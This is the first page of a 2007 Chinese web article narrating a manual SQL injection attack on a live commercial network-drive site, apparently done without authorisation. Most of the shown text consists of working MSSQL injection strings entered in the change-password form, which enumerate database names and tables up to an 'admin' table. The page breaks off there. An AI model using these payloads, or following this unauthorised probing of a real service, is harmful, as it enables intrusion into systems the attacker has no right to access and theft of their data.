文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | firefox | WPS | 杀毒软件 | Picasa
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形图像 办公软件 媒体动画 精文荟萃 常用软件 网页编程 技术开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全对一个大型网络硬盘营业站点的测试
精品推荐
特别推荐
·信息安全问题需解决方案
·多角度详细解释网站安全保护方法
·端口截听实现端口隐藏,嗅叹与攻击
·用Win NT/2K 建WEB站点安全指南
·实现 Web 应用程序安全的捷径
·解析远程控制带来的安全危险
·NTFS启动扇区的默认保护是什么?
·假冒腾讯qq网络骗子欺诈骗术大曝光
·基础知识:被人轻视的七大网络安全误解
·确保无线网络安全实施的技术规范
·安全之深入理解DoS拒绝服务攻击
·安全防范 认识瞬时攻击的危险性
·面临什么新威胁 PC安全终极指南
·安全漏洞的起因:ActiveX技术安全报告
·预防网络病毒的几个忠告
·完全防御DDoS攻击的实时监测模型
·安全基础知识 细说暴库的原理与方法
·分布式拒绝服务(DDOS)攻击及防范研究
·给WIN2003 IIS SQL服务器安全加固
·知己知彼 2007年网络安全技术发展分析
热点TOP10
·假冒腾讯qq网络骗子欺诈骗术大曝光
·最强安全基础 从0到33600端口详解
·信息安全问题需解决方案
·CISCO路由器配置小结
·开3389最简单得方法
·微软安全警告:Word用户面临危险
·使用 OpenSSL API 进行安全编程
·nc.exe高级技巧应用汇总
·恢复本来面目 消除JPEG图片马赛克
·黑客必备的基本技能
·“网警”提醒:警惕“U盘杀手”病毒
·组策略安全选项对应注册表项汇总
·使用Windows的安全802.11网络企业部署一
·HACK成功率达80%!小心你的ADSL猫
·Windows 2003安全性指南之强化域控制器(1)
·软件漏洞及缓冲区溢出
·以Guest帐户身份创建一个管理员
·保护公司数据安全的绝妙高招
·恶意代码(网页病毒)[破解方法]
·公开十七项恶意代码

对一个大型网络硬盘营业站点的测试

日期:2007年4月30日 作者: 查看:[大字体 中字体 小字体]


晚上,闲来无事,QQ群又吵死..无奈,于是对经常用的网络硬盘的一个网站测试,现在的注入弱点都已经封得不能再封了,没办法,不过逛来逛去,来到了一个提交表单的面前"修改密码"。

本次全为手动,没有用任何工具.

 

对一个大型网络硬盘营业站点的测试(图一)





在用户名中加了一个',返回以下错误

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' AND datediff(hour,ChangeTime,getdate())<=1 AND SUCceed=0' 之前有未闭合的引号。

/service/changepass.ASP,行 99

nnd,原来是asp+MSSQL,好,要玩就玩大的.

既然用户名里可以输入,其它三个框都没有必要了,于是在本地搭建一个表单,maxlength="150" size="150",设得长一些,好可以输入语句.

 

对一个大型网络硬盘营业站点的测试(图二)
(点击查看原图)



首先说明,在mssql数据库中sysdatabase中是默认系统表,包含master、model、msdb、mssqlweb和empdb 5个数据库的项,dbid从1到5是系统的,分别是以上5个项,如果用户新建的话,那么dbid肯定从6开始,那么我们就试试暴出它玩玩.

在用户输入框中输入:

' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and '1'='1

返回如下图所值

对一个大型网络硬盘营业站点的测试(图三)



好的,一个Northwind 库名暴了出来,哎~~要的不是这个,下来依次提交dbid=7,报出了如下图结果:

对一个大型网络硬盘营业站点的测试(图四)



HOHO

这个是我所要的,因为我把dbid从6到8到试过了,后面都是返回了正常页面,而且当dbid=7的时候,这里的库名和网站的名称是一样的,所以确定为网站的库名。 其中我已经把库名屏蔽,以下用xxxxxxx来表示.............

既然得到了库名,相应的就是要暴出他的表名。OK,依然往下提交。

' and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U') and '1'='1

OK,结果暴出了如下图

对一个大型网络硬盘营业站点的测试(图五)



哎,得到Email_filts不是我要的,继续提交

'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts')) and '1'='1

得到'ADDSize_LOG'

继续提交

'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts','ADDSize_LOG')) and '1'='1

得到'admin',好了,得到他了,应该没有错,HOHO

得到admin这个表,下来就是要表中的值了.

在用户名中提交:

'and 0<>(select count(*) from xxxxxxx.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) and '1'='1

对一个大型网络硬盘营业站点的测试(图六)


[1] [2] 下一页 




上一篇:破解asp木马密码

下一篇:SQL注入的不常见方法

对一个大型网络硬盘营业站点的测试 相关文章:
·对一个大型网络硬盘营业站点的测试
对一个大型网络硬盘营业站点的测试 相关软件:

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:vipcn